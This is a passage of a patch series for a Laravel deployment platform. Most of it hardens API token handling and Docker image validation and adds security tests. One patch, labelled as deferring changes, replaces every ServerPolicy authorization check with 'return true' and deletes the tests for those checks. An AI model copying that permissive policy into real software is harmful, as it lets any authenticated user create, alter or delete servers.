+        return $user instanceof User ? $user->id : $user;
+    }
+}
diff --git a/app/Http/Kernel.php b/app/Http/Kernel.php
index a584bc111..02a49aaa8 100644
--- a/app/Http/Kernel.php
+++ b/app/Http/Kernel.php
@@ -12,6 +12,7 @@
 use App\Http\Middleware\DecideWhatToDoWithUser;
 use App\Http\Middleware\EncryptCookies;
 use App\Http\Middleware\EnsureMcpEnabled;
+use App\Http\Middleware\EnsureTokenBelongsToCurrentTeamMember;
 use App\Http\Middleware\PreventRequestsDuringMaintenance;
 use App\Http\Middleware\RedirectIfAuthenticated;
 use App\Http\Middleware\TrimStrings;
@@ -104,6 +105,7 @@ class Kernel extends HttpKernel
         'ability' => CheckForAnyAbility::class,
         'api.ability' => ApiAbility::class,
         'api.sensitive' => ApiSensitiveData::class,
+        'api.token.team' => EnsureTokenBelongsToCurrentTeamMember::class,
         'can.create.resources' => CanCreateResources::class,
         'can.update.resource' => CanUpdateResource::class,
         'can.access.terminal' => CanAccessTerminal::class,
diff --git a/app/Http/Middleware/EnsureTokenBelongsToCurrentTeamMember.php b/app/Http/Middleware/EnsureTokenBelongsToCurrentTeamMember.php
new file mode 100644
index 000000000..7c858b38b
--- /dev/null
+++ b/app/Http/Middleware/EnsureTokenBelongsToCurrentTeamMember.php
@@ -0,0 +1,37 @@
+<?php
+
+namespace App\Http\Middleware;
+
+use Closure;
+use Illuminate\Http\Request;
+use Symfony\Component\HttpFoundation\Response;
+
+class EnsureTokenBelongsToCurrentTeamMember
+{
+    public function handle(Request $request, Closure $next): Response
+    {
+        $user = $request->user();
+        $token = $user?->currentAccessToken();
+        $teamId = $token?->team_id;
+
+        if (! $user || ! $token || is_null($teamId)) {
+            return response()->json(['message' => 'Invalid token.'], 401);
+        }
+
+        $team = $user->teams()
+            ->where('teams.id', $teamId)
+            ->first();
+
+        if (! $team) {
+            return response()->json(['message' => 'Invalid token.'], 401);
+        }
+
+        $role = $team->pivot?->role;
+        if (($token->can('root') || $token->can('write') || $token->can('write:sensitive'))
+            && ! in_array($role, ['admin', 'owner'], true)) {
+            return response()->json(['message' => 'Missing required team role.'], 403);
+        }
+
+        return $next($request);
+    }
+}
diff --git a/app/Livewire/Team/Member.php b/app/Livewire/Team/Member.php
index b1f692365..97d492d70 100644
--- a/app/Livewire/Team/Member.php
+++ b/app/Livewire/Team/Member.php
@@ -2,6 +2,7 @@
 
 namespace App\Livewire\Team;
 
+use App\Actions\User\RevokeUserTeamTokens;
 use App\Enums\Role;
 use App\Models\User;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
@@ -23,7 +24,9 @@ public function makeAdmin()
                 || Role::from($this->getMemberRole())->gt(auth()->user()->role())) {
                 throw new \Exception('You are not authorized to perform this action.');
             }
-            $this->member->teams()->updateExistingPivot(currentTeam()->id, ['role' => Role::ADMIN->value]);
+            $teamId = currentTeam()->id;
+            $this->member->teams()->updateExistingPivot($teamId, ['role' => Role::ADMIN->value]);
+            RevokeUserTeamTokens::forUserTeam($this->member, $teamId);
             $this->dispatch('reloadWindow');
         } catch (\Exception $e) {
             $this->dispatch('error', $e->getMessage());
@@ -39,7 +42,9 @@ public function makeOwner()
                 || Role::from($this->getMemberRole())->gt(auth()->user()->role())) {
                 throw new \Exception('You are not authorized to perform this action.');
             }
-            $this->member->teams()->updateExistingPivot(currentTeam()->id, ['role' => Role::OWNER->value]);
+            $teamId = currentTeam()->id;
+            $this->member->teams()->updateExistingPivot($teamId, ['role' => Role::OWNER->value]);
+            RevokeUserTeamTokens::forUserTeam($this->member, $teamId);
             $this->dispatch('reloadWindow');
         } catch (\Exception $e) {
             $this->dispatch('error', $e->getMessage());
@@ -55,7 +60,9 @@ public function makeReadonly()
                 || Role::from($this->getMemberRole())->gt(auth()->user()->role())) {
                 throw new \Exception('You are not authorized to perform this action.');
             }
-            $this->member->teams()->updateExistingPivot(currentTeam()->id, ['role' => Role::MEMBER->value]);
+            $teamId = currentTeam()->id;
+            $this->member->teams()->updateExistingPivot($teamId, ['role' => Role::MEMBER->value]);
+            RevokeUserTeamTokens::forUserTeam($this->member, $teamId);
             $this->dispatch('reloadWindow');
         } catch (\Exception $e) {
             $this->dispatch('error', $e->getMessage());
@@ -73,6 +80,7 @@ public function remove()
             }
             $teamId = currentTeam()->id;
             $this->member->teams()->detach(currentTeam());
+            RevokeUserTeamTokens::forUserTeam($this->member, $teamId);
             // Clear cache for the removed user - both old and new key formats
             Cache::forget("team:{$this->member->id}");
             Cache::forget("user:{$this->member->id}:team:{$teamId}");
diff --git a/app/Mcp/Concerns/ResolvesTeam.php b/app/Mcp/Concerns/ResolvesTeam.php
index f75219fcf..f6d82453a 100644
--- a/app/Mcp/Concerns/ResolvesTeam.php
+++ b/app/Mcp/Concerns/ResolvesTeam.php
@@ -28,8 +28,14 @@ protected function ensureAbility(Request $request, string $ability = 'read'): ?R
 
     protected function resolveTeamId(Request $request): ?int
     {
-        $token = $request->user()?->currentAccessToken();
+        $user = $request->user();
+        $token = $user?->currentAccessToken();
+        $teamId = $token?->team_id;
 
-        return $token?->team_id;
+        if (! $user || is_null($teamId) || ! $user->teams()->where('teams.id', $teamId)->exists()) {
+            return null;
+        }
+
+        return (int) $teamId;
     }
 }
diff --git a/app/Models/Team.php b/app/Models/Team.php
index 0fbcfe0c6..f0a50cf69 100644
--- a/app/Models/Team.php
+++ b/app/Models/Team.php
@@ -2,6 +2,7 @@
 
 namespace App\Models;
 
+use App\Actions\User\RevokeUserTeamTokens;
 use App\Events\ServerReachabilityChanged;
 use App\Notifications\Channels\SendsDiscord;
 use App\Notifications\Channels\SendsEmail;
@@ -72,6 +73,8 @@ protected static function booted()
         });
 
         static::deleting(function (Team $team) {
+            RevokeUserTeamTokens::forTeam($team->id);
+
             foreach ($team->privateKeys as $key) {
                 $key->delete();
             }
diff --git a/app/Models/User.php b/app/Models/User.php
index cefdf3d3e..9cbe88835 100644
--- a/app/Models/User.php
+++ b/app/Models/User.php
@@ -2,6 +2,7 @@
 
 namespace App\Models;
 
+use App\Actions\User\RevokeUserTeamTokens;
 use App\Jobs\UpdateStripeCustomerEmailJob;
 use App\Notifications\Channels\SendsEmail;
 use App\Notifications\TransactionalEmails\EmailChangeVerification;
@@ -121,6 +122,8 @@ protected static function boot()
 
         static::deleting(function (User $user) {
             \DB::transaction(function () use ($user) {
+                RevokeUserTeamTokens::forUser($user);
+
                 $teams = $user->teams;
                 foreach ($teams as $team) {
                     $user_alone_in_team = $team->members->count() === 1;
@@ -158,6 +161,7 @@ protected static function boot()
                             if ($found_other_member_who_is_not_owner) {
                                 $found_other_member_who_is_not_owner->pivot->role = 'owner';
                                 $found_other_member_who_is_not_owner->pivot->save();
+                                RevokeUserTeamTokens::forUserTeam($found_other_member_who_is_not_owner, $team->id);
                                 $team->members()->detach($user->id);
                             } else {
                                 static::finalizeTeamDeletion($user, $team);
diff --git a/app/Traits/DeletesUserSessions.php b/app/Traits/DeletesUserSessions.php
index e9ec0d946..44ff5f727 100644
--- a/app/Traits/DeletesUserSessions.php
+++ b/app/Traits/DeletesUserSessions.php
@@ -2,6 +2,7 @@
 
 namespace App\Traits;
 
+use App\Actions\User\RevokeUserTeamTokens;
 use Illuminate\Support\Facades\DB;
 use Illuminate\Support\Facades\Session;
 
@@ -17,6 +18,7 @@ public function deleteAllSessions(): void
         Session::invalidate();
         Session::regenerateToken();
         DB::table('sessions')->where('user_id', $this->id)->delete();
+        RevokeUserTeamTokens::forUser($this->id);
     }
 
     /**
diff --git a/bootstrap/helpers/api.php b/bootstrap/helpers/api.php
index 4b76200d2..85703365d 100644
--- a/bootstrap/helpers/api.php
+++ b/bootstrap/helpers/api.php
@@ -3,15 +3,22 @@
 use App\Enums\BuildPackTypes;
 use App\Enums\RedirectTypes;
 use App\Enums\StaticImageTypes;
+use App\Support\ValidationPatterns;
 use Illuminate\Database\Eloquent\Collection;
 use Illuminate\Http\Request;
 use Illuminate\Validation\Rule;
 
 function getTeamIdFromToken()
 {
-    $token = auth()->user()->currentAccessToken();
+    $user = auth()->user();
+    $token = $user?->currentAccessToken();
+    $teamId = data_get($token, 'team_id');
 
-    return data_get($token, 'team_id');
+    if (! $user || is_null($teamId) || ! $user->teams()->where('teams.id', $teamId)->exists()) {
+        return null;
+    }
+
+    return $teamId;
 }
 function invalidTokenResponse()
 {
@@ -95,14 +102,14 @@ function sharedDataApplications()
         'git_commit_sha' => ['string', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'],
         'docker_registry_image_name' => 'string|nullable',
         'docker_registry_image_tag' => 'string|nullable',
-        'install_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'build_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'start_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'install_command' => ValidationPatterns::shellSafeCommandRules(),
+        'build_command' => ValidationPatterns::shellSafeCommandRules(),
+        'start_command' => ValidationPatterns::shellSafeCommandRules(),
         'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/',
         'ports_mappings' => 'string|regex:/^(\d+:\d+)(,\d+:\d+)*$/|nullable',
         'custom_network_aliases' => 'string|nullable',
-        'base_directory' => \App\Support\ValidationPatterns::directoryPathRules(),
-        'publish_directory' => \App\Support\ValidationPatterns::directoryPathRules(),
+        'base_directory' => ValidationPatterns::directoryPathRules(),
+        'publish_directory' => ValidationPatterns::directoryPathRules(),
         'health_check_enabled' => 'boolean',
         'health_check_type' => 'string|in:http,cmd',
         'health_check_command' => ['nullable', 'string', 'max:1000', 'regex:/^[a-zA-Z0-9 \-_.\/:=@,+]+$/'],
@@ -125,24 +132,24 @@ function sharedDataApplications()
         'limits_cpuset' => 'string|nullable',
         'limits_cpu_shares' => 'numeric',
         'custom_labels' => 'string|nullable',
-        'custom_docker_run_options' => \App\Support\ValidationPatterns::shellSafeCommandRules(2000),
+        'custom_docker_run_options' => ValidationPatterns::shellSafeCommandRules(2000),
         // Security: deployment commands are intentionally arbitrary shell (e.g. "php artisan migrate").
         // Access is gated by API token authentication. Commands run inside the app container, not the host.
         'post_deployment_command' => 'string|nullable',
-        'post_deployment_command_container' => \App\Support\ValidationPatterns::containerNameRules(),
+        'post_deployment_command_container' => ValidationPatterns::containerNameRules(),
         'pre_deployment_command' => 'string|nullable',
-        'pre_deployment_command_container' => \App\Support\ValidationPatterns::containerNameRules(),
+        'pre_deployment_command_container' => ValidationPatterns::containerNameRules(),
         'manual_webhook_secret_github' => 'string|nullable',
         'manual_webhook_secret_gitlab' => 'string|nullable',
         'manual_webhook_secret_bitbucket' => 'string|nullable',
         'manual_webhook_secret_gitea' => 'string|nullable',
-        'dockerfile_location' => \App\Support\ValidationPatterns::filePathRules(),
-        'dockerfile_target_build' => \App\Support\ValidationPatterns::dockerTargetRules(),
-        'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
+        'dockerfile_location' => ValidationPatterns::filePathRules(),
+        'dockerfile_target_build' => ValidationPatterns::dockerTargetRules(),
+        'docker_compose_location' => ValidationPatterns::filePathRules(),
         'docker_compose' => 'string|nullable',
         'docker_compose_domains' => 'array|nullable',
-        'docker_compose_custom_start_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'docker_compose_custom_build_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'docker_compose_custom_start_command' => ValidationPatterns::shellSafeCommandRules(),
+        'docker_compose_custom_build_command' => ValidationPatterns::shellSafeCommandRules(),
         'is_container_label_escape_enabled' => 'boolean',
         'is_preserve_repository_enabled' => 'boolean',
     ];
diff --git a/routes/ai.php b/routes/ai.php
index 7d3a858c5..3a39677ff 100644
--- a/routes/ai.php
+++ b/routes/ai.php
@@ -4,4 +4,4 @@
 use Laravel\Mcp\Facades\Mcp;
 
 Mcp::web('/mcp', CoolifyServer::class)
-    ->middleware(['mcp.enabled', 'auth:sanctum']);
+    ->middleware(['mcp.enabled', 'auth:sanctum', 'api.token.team']);
diff --git a/routes/api.php b/routes/api.php
index fb3b4bad6..ec6bde2e6 100644
--- a/routes/api.php
+++ b/routes/api.php
@@ -29,7 +29,7 @@
     ->middleware('throttle:feedback');
 
 Route::group([
-    'middleware' => ['auth:sanctum', 'api.ability:write'],
+    'middleware' => ['auth:sanctum', 'api.token.team', 'api.ability:write'],
     'prefix' => 'v1',
 ], function () {
     Route::get('/enable', [OtherController::class, 'enable_api']);
@@ -38,7 +38,7 @@
     Route::post('/mcp/disable', [OtherController::class, 'disable_mcp']);
 });
 Route::group([
-    'middleware' => ['auth:sanctum', ApiAllowed::class, 'api.sensitive'],
+    'middleware' => ['auth:sanctum', 'api.token.team', ApiAllowed::class, 'api.sensitive'],
     'prefix' => 'v1',
 ], function () {
 
diff --git a/tests/Feature/ApiTokenTeamLifecycleSecurityTest.php b/tests/Feature/ApiTokenTeamLifecycleSecurityTest.php
new file mode 100644
index 000000000..d5ab83af0
--- /dev/null
+++ b/tests/Feature/ApiTokenTeamLifecycleSecurityTest.php
@@ -0,0 +1,128 @@
+<?php
+
+use App\Livewire\Security\ApiTokens;
+use App\Livewire\Team\Member;
+use App\Models\InstanceSettings;
+use App\Models\Project;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\DB;
+use Illuminate\Support\Facades\Hash;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    InstanceSettings::unguarded(fn () => InstanceSettings::query()->create([
+        'id' => 0,
+        'is_api_enabled' => true,
+    ]));
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'admin']);
+    session(['currentTeam' => $this->team]);
+});
+
+function bearerJson(string $token): array
+{
+    return [
+        'Authorization' => 'Bearer '.$token,
+        'Content-Type' => 'application/json',
+    ];
+}
+
+test('removed member token cannot read team projects', function () {
+    Project::create(['name' => 'Secret', 'team_id' => $this->team->id]);
+    $token = $this->user->createToken('read-token', ['read'])->plainTextToken;
+
+    $this->team->members()->detach($this->user->id);
+
+    $this->withHeaders(bearerJson($token))
+        ->getJson('/api/v1/projects')
+        ->assertUnauthorized();
+});
+
+test('removed member token cannot create team projects', function () {
+    $token = $this->user->createToken('write-token', ['write'])->plainTextToken;
+
+    $this->team->members()->detach($this->user->id);
+
+    $this->withHeaders(bearerJson($token))
+        ->postJson('/api/v1/projects', ['name' => 'Should Not Exist'])
+        ->assertUnauthorized();
+
+    expect(Project::where('name', 'Should Not Exist')->exists())->toBeFalse();
+});
+
+test('downgraded member old write token cannot create team projects', function () {
+    $token = $this->user->createToken('write-token', ['write'])->plainTextToken;
+
+    $this->team->members()->updateExistingPivot($this->user->id, ['role' => 'member']);
+
+    $this->withHeaders(bearerJson($token))
+        ->postJson('/api/v1/projects', ['name' => 'Downgrade Bypass'])
+        ->assertForbidden();
+
+    expect(Project::where('name', 'Downgrade Bypass')->exists())->toBeFalse();
+});
+
+test('admin removal through team member component revokes team tokens', function () {
+    $owner = User::factory()->create();
+    $this->team->members()->attach($owner->id, ['role' => 'owner']);
+    $token = $this->user->createToken('read-token', ['read'])->accessToken;
+
+    $this->actingAs($owner);
+    session(['currentTeam' => $this->team]);
+
+    Livewire::test(Member::class, ['member' => $this->user])
+        ->call('remove');
+
+    expect(DB::table('personal_access_tokens')->where('id', $token->id)->exists())->toBeFalse();
+});
+
+test('role downgrade through team member component revokes team tokens', function () {
+    $owner = User::factory()->create();
+    $this->team->members()->attach($owner->id, ['role' => 'owner']);
+    $token = $this->user->createToken('write-token', ['write'])->accessToken;
+
+    $this->actingAs($owner);
+    session(['currentTeam' => $this->team]);
+
+    Livewire::test(Member::class, ['member' => $this->user])
+        ->call('makeReadonly');
+
+    expect(DB::table('personal_access_tokens')->where('id', $token->id)->exists())->toBeFalse();
+});
+
+test('member cannot create write token through livewire token form', function () {
+    $this->team->members()->updateExistingPivot($this->user->id, ['role' => 'member']);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => $this->team]);
+
+    Livewire::test(ApiTokens::class)
+        ->set('description', 'member-write-token')
+        ->set('expiresInDays', 30)
+        ->set('permissions', ['write'])
+        ->call('addNewToken');
+
+    expect($this->user->tokens()->where('name', 'member-write-token')->exists())->toBeFalse();
+});
+
+test('password change revokes user personal access tokens', function () {
+    $token = $this->user->createToken('read-token', ['read'])->accessToken;
+
+    $this->user->forceFill(['password' => Hash::make('new-password')])->save();
+
+    expect(DB::table('personal_access_tokens')->where('id', $token->id)->exists())->toBeFalse();
+});
+
+test('team deletion revokes team bound personal access tokens', function () {
+    $token = $this->user->createToken('read-token', ['read'])->accessToken;
+
+    $this->team->delete();
+
+    expect(DB::table('personal_access_tokens')->where('id', $token->id)->exists())->toBeFalse();
+});
diff --git a/tests/Feature/Mcp/McpEndpointTest.php b/tests/Feature/Mcp/McpEndpointTest.php
index 34ae493cc..ae0101547 100644
--- a/tests/Feature/Mcp/McpEndpointTest.php
+++ b/tests/Feature/Mcp/McpEndpointTest.php
@@ -192,3 +192,14 @@ function mcpToolJson($response): array
     expect($response->json('result.isError'))->toBeTrue();
     expect($response->json('result.content.0.text'))->toContain('Missing required permissions');
 });
+
+test('MCP rejects token when user no longer belongs to token team', function () {
+    Project::create(['name' => 'Hidden', 'team_id' => $this->team->id]);
+    $token = $this->user->createToken('mcp-read', ['read'])->plainTextToken;
+
+    $this->team->members()->detach($this->user->id);
+
+    $response = mcpCallTool($token, 'list_projects');
+
+    $response->assertUnauthorized();
+});

From 51894d9c05dea872cffe79c61ed4d0f08f863f1e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 10:57:14 +0200
Subject: [PATCH 69/90] chore: defer server policy changes

---
 app/Policies/ServerPolicy.php                | 26 ++++----
 tests/Unit/ServerPolicyAuthorizationTest.php | 66 --------------------
 2 files changed, 14 insertions(+), 78 deletions(-)
 delete mode 100644 tests/Unit/ServerPolicyAuthorizationTest.php

diff --git a/app/Policies/ServerPolicy.php b/app/Policies/ServerPolicy.php
index 659598139..6d2396a7d 100644
--- a/app/Policies/ServerPolicy.php
+++ b/app/Policies/ServerPolicy.php
@@ -28,7 +28,8 @@ public function view(User $user, Server $server): bool
      */
     public function create(User $user): bool
     {
-        return $user->isAdmin();
+        // return $user->isAdmin();
+        return true;
     }
 
     /**
@@ -36,7 +37,8 @@ public function create(User $user): bool
      */
     public function update(User $user, Server $server): bool
     {
-        return $this->canManageServer($user, $server);
+        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
+        return true;
     }
 
     /**
@@ -44,7 +46,8 @@ public function update(User $user, Server $server): bool
      */
     public function delete(User $user, Server $server): bool
     {
-        return $this->canManageServer($user, $server);
+        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
+        return true;
     }
 
     /**
@@ -68,7 +71,8 @@ public function forceDelete(User $user, Server $server): bool
      */
     public function manageProxy(User $user, Server $server): bool
     {
-        return $this->canManageServer($user, $server);
+        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
+        return true;
     }
 
     /**
@@ -76,7 +80,8 @@ public function manageProxy(User $user, Server $server): bool
      */
     public function manageSentinel(User $user, Server $server): bool
     {
-        return $this->canManageServer($user, $server);
+        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
+        return true;
     }
 
     /**
@@ -84,7 +89,8 @@ public function manageSentinel(User $user, Server $server): bool
      */
     public function manageCaCertificate(User $user, Server $server): bool
     {
-        return $this->canManageServer($user, $server);
+        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
+        return true;
     }
 
     /**
@@ -92,11 +98,7 @@ public function manageCaCertificate(User $user, Server $server): bool
      */
     public function viewSecurity(User $user, Server $server): bool
     {
-        return $this->canManageServer($user, $server);
-    }
-
-    private function canManageServer(User $user, Server $server): bool
-    {
-        return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
+        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
+        return true;
     }
 }
diff --git a/tests/Unit/ServerPolicyAuthorizationTest.php b/tests/Unit/ServerPolicyAuthorizationTest.php
deleted file mode 100644
index 97b8adbc6..000000000
--- a/tests/Unit/ServerPolicyAuthorizationTest.php
+++ /dev/null
@@ -1,66 +0,0 @@
-<?php
-
-use App\Models\Server;
-use App\Models\Team;
-use App\Models\User;
-use App\Policies\ServerPolicy;
-use Illuminate\Database\Eloquent\Relations\Pivot;
-
-function userWithServerRole(int $teamId, string $role): User
-{
-    $team = new Team;
-    $team->setRawAttributes(['id' => $teamId], true);
-    $team->setRelation('pivot', new Pivot(['role' => $role]));
-
-    $user = new User;
-    $user->setRelation('teams', collect([$team]));
-    $user->setRelation('pivot', new Pivot(['role' => $role]));
-
-    return $user;
-}
-
-function serverPolicyServer(int $teamId): Server
-{
-    $server = new Server;
-    $server->setRawAttributes(['team_id' => $teamId], true);
-
-    return $server;
-}
-
-test('server members cannot update or manage servers', function () {
-    $policy = new ServerPolicy;
-    $member = userWithServerRole(1, 'member');
-    $server = serverPolicyServer(1);
-
-    expect($policy->update($member, $server))->toBeFalse()
-        ->and($policy->create($member))->toBeFalse()
-        ->and($policy->delete($member, $server))->toBeFalse()
-        ->and($policy->manageProxy($member, $server))->toBeFalse()
-        ->and($policy->manageSentinel($member, $server))->toBeFalse()
-        ->and($policy->manageCaCertificate($member, $server))->toBeFalse()
-        ->and($policy->viewSecurity($member, $server))->toBeFalse();
-});
-
-test('server admins can update and manage servers in their team', function (string $role) {
-    $policy = new ServerPolicy;
-    $admin = userWithServerRole(1, $role);
-    $server = serverPolicyServer(1);
-
-    expect($policy->update($admin, $server))->toBeTrue()
-        ->and($policy->create($admin))->toBeTrue()
-        ->and($policy->delete($admin, $server))->toBeTrue()
-        ->and($policy->manageProxy($admin, $server))->toBeTrue()
-        ->and($policy->manageSentinel($admin, $server))->toBeTrue()
-        ->and($policy->manageCaCertificate($admin, $server))->toBeTrue()
-        ->and($policy->viewSecurity($admin, $server))->toBeTrue();
-})->with(['admin', 'owner']);
-
-test('server admins cannot update servers outside their team', function () {
-    $policy = new ServerPolicy;
-    $admin = userWithServerRole(2, 'admin');
-    $server = serverPolicyServer(1);
-
-    expect($policy->update($admin, $server))->toBeFalse()
-        ->and($policy->delete($admin, $server))->toBeFalse()
-        ->and($policy->manageProxy($admin, $server))->toBeFalse();
-});

From 7193a5d0f646e5df743ed219f135af01a8c6c6a2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 11:05:51 +0200
Subject: [PATCH 70/90] fix(tests): reuse instance settings in API token team
 tests

---
 tests/Feature/ApiTokenTeamLifecycleSecurityTest.php | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/tests/Feature/ApiTokenTeamLifecycleSecurityTest.php b/tests/Feature/ApiTokenTeamLifecycleSecurityTest.php
index d5ab83af0..c254a26c3 100644
--- a/tests/Feature/ApiTokenTeamLifecycleSecurityTest.php
+++ b/tests/Feature/ApiTokenTeamLifecycleSecurityTest.php
@@ -14,10 +14,10 @@
 uses(RefreshDatabase::class);
 
 beforeEach(function () {
-    InstanceSettings::unguarded(fn () => InstanceSettings::query()->create([
-        'id' => 0,
-        'is_api_enabled' => true,
-    ]));
+    InstanceSettings::unguarded(fn () => InstanceSettings::query()->updateOrCreate(
+        ['id' => 0],
+        ['is_api_enabled' => true],
+    ));
 
     $this->team = Team::factory()->create();
     $this->user = User::factory()->create();

From d72c1e2a4769b4b9721f3ff91fab1352d3a2ced0 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 15:12:58 +0200
Subject: [PATCH 71/90] fix(applications): harden image validation

---
 .../Api/ApplicationsController.php            |   5 +-
 app/Jobs/ApplicationDeploymentJob.php         |  16 +++
 app/Livewire/Project/Application/General.php  |   6 +-
 app/Livewire/Project/New/DockerImage.php      |   5 +-
 app/Rules/DockerImageFormat.php               |  35 +++---
 app/Support/ValidationPatterns.php            |  92 +++++++++++++++
 bootstrap/helpers/api.php                     |  31 ++---
 ...onDockerRegistryImageValidationApiTest.php | 108 ++++++++++++++++++
 ...neralDockerRegistryImageValidationTest.php |  21 ++++
 .../DockerImageReferenceValidationTest.php    | 108 ++++++++++++++++++
 10 files changed, 392 insertions(+), 35 deletions(-)
 create mode 100644 tests/Feature/ApplicationDockerRegistryImageValidationApiTest.php
 create mode 100644 tests/Feature/Livewire/ApplicationGeneralDockerRegistryImageValidationTest.php
 create mode 100644 tests/Unit/DockerImageReferenceValidationTest.php

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index 074269fa0..0bef2dc0f 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -17,6 +17,7 @@
 use App\Models\PrivateKey;
 use App\Models\Project;
 use App\Models\Server;
+use App\Rules\DockerImageFormat;
 use App\Rules\ValidGitBranch;
 use App\Rules\ValidGitRepositoryUrl;
 use App\Services\DockerImageParser;
@@ -1790,8 +1791,8 @@ private function create_application(Request $request, $type)
             ]))->setStatusCode(201);
         } elseif ($type === 'dockerimage') {
             $validationRules = [
-                'docker_registry_image_name' => 'string|required',
-                'docker_registry_image_tag' => 'string',
+                'docker_registry_image_name' => ['required', 'string', 'max:255', new DockerImageFormat],
+                'docker_registry_image_tag' => ValidationPatterns::dockerImageTagRules(),
                 'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/|required',
             ];
             $validationRules = array_merge(sharedDataApplications(), $validationRules);
diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 2edc08235..c8fc20a69 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -220,6 +220,7 @@ public function __construct(public int $application_deployment_queue_id)
         $this->restart_only = $this->restart_only && $this->application->build_pack !== 'dockerimage' && $this->application->build_pack !== 'dockerfile';
         $this->only_this_server = $this->application_deployment_queue->only_this_server;
         $this->dockerImagePreviewTag = $this->application_deployment_queue->docker_registry_image_tag;
+        $this->validateDockerRegistryImageConfiguration();
 
         $this->git_type = data_get($this->application_deployment_queue, 'git_type');
 
@@ -1139,6 +1140,21 @@ private function shouldPushDockerRegistryImageTag(): bool
         return $this->pull_request_id === 0;
     }
 
+    private function validateDockerRegistryImageConfiguration(): void
+    {
+        if (! ValidationPatterns::isValidDockerImageName($this->application->docker_registry_image_name)) {
+            throw new DeploymentException('Docker registry image name contains invalid characters.');
+        }
+
+        if (! ValidationPatterns::isValidDockerImageTag($this->application->docker_registry_image_tag)) {
+            throw new DeploymentException('Docker registry image tag contains invalid characters.');
+        }
+
+        if (! ValidationPatterns::isValidDockerImageTag($this->dockerImagePreviewTag)) {
+            throw new DeploymentException('Docker registry preview image tag contains invalid characters.');
+        }
+    }
+
     private function generate_image_names()
     {
         if ($this->application->dockerfile) {
diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php
index 258b54eed..2a64b3b21 100644
--- a/app/Livewire/Project/Application/General.php
+++ b/app/Livewire/Project/Application/General.php
@@ -157,8 +157,8 @@ protected function rules(): array
             'portsMappings' => ValidationPatterns::portMappingRules(),
             'customNetworkAliases' => 'nullable',
             'dockerfile' => 'nullable',
-            'dockerRegistryImageName' => 'nullable',
-            'dockerRegistryImageTag' => 'nullable',
+            'dockerRegistryImageName' => ValidationPatterns::dockerImageNameRules(),
+            'dockerRegistryImageTag' => ValidationPatterns::dockerImageTagRules(),
             'dockerfileLocation' => ValidationPatterns::filePathRules(),
             'dockerComposeLocation' => ValidationPatterns::filePathRules(),
             'dockerCompose' => 'nullable',
@@ -848,7 +848,7 @@ public function submit($showToaster = true)
             }
             if ($this->buildPack === 'dockerimage') {
                 $this->validate([
-                    'dockerRegistryImageName' => 'required',
+                    'dockerRegistryImageName' => ValidationPatterns::dockerImageNameRules(required: true),
                 ]);
             }
 
diff --git a/app/Livewire/Project/New/DockerImage.php b/app/Livewire/Project/New/DockerImage.php
index b89ce2c6a..737806cb8 100644
--- a/app/Livewire/Project/New/DockerImage.php
+++ b/app/Livewire/Project/New/DockerImage.php
@@ -5,6 +5,7 @@
 use App\Models\Application;
 use App\Models\Project;
 use App\Services\DockerImageParser;
+use App\Support\ValidationPatterns;
 use Livewire\Component;
 use Visus\Cuid2\Cuid2;
 
@@ -81,8 +82,8 @@ public function updatedImageName(): void
     public function submit()
     {
         $this->validate([
-            'imageName' => ['required', 'string'],
-            'imageTag' => ['nullable', 'string', 'regex:/^[a-z0-9][a-z0-9._-]*$/i'],
+            'imageName' => ValidationPatterns::dockerImageNameRules(required: true),
+            'imageTag' => ValidationPatterns::dockerImageTagRules(),
             'imageSha256' => ['nullable', 'string', 'regex:/^[a-f0-9]{64}$/i'],
         ]);
 
diff --git a/app/Rules/DockerImageFormat.php b/app/Rules/DockerImageFormat.php
index a6a78a76c..038cc2761 100644
--- a/app/Rules/DockerImageFormat.php
+++ b/app/Rules/DockerImageFormat.php
@@ -2,18 +2,26 @@
 
 namespace App\Rules;
 
+use App\Support\ValidationPatterns;
 use Closure;
 use Illuminate\Contracts\Validation\ValidationRule;
+use Illuminate\Translation\PotentiallyTranslatedString;
 
 class DockerImageFormat implements ValidationRule
 {
     /**
      * Run the validation rule.
      *
-     * @param  \Closure(string, ?string=): \Illuminate\Translation\PotentiallyTranslatedString  $fail
+     * @param  Closure(string, ?string=): PotentiallyTranslatedString  $fail
      */
     public function validate(string $attribute, mixed $value, Closure $fail): void
     {
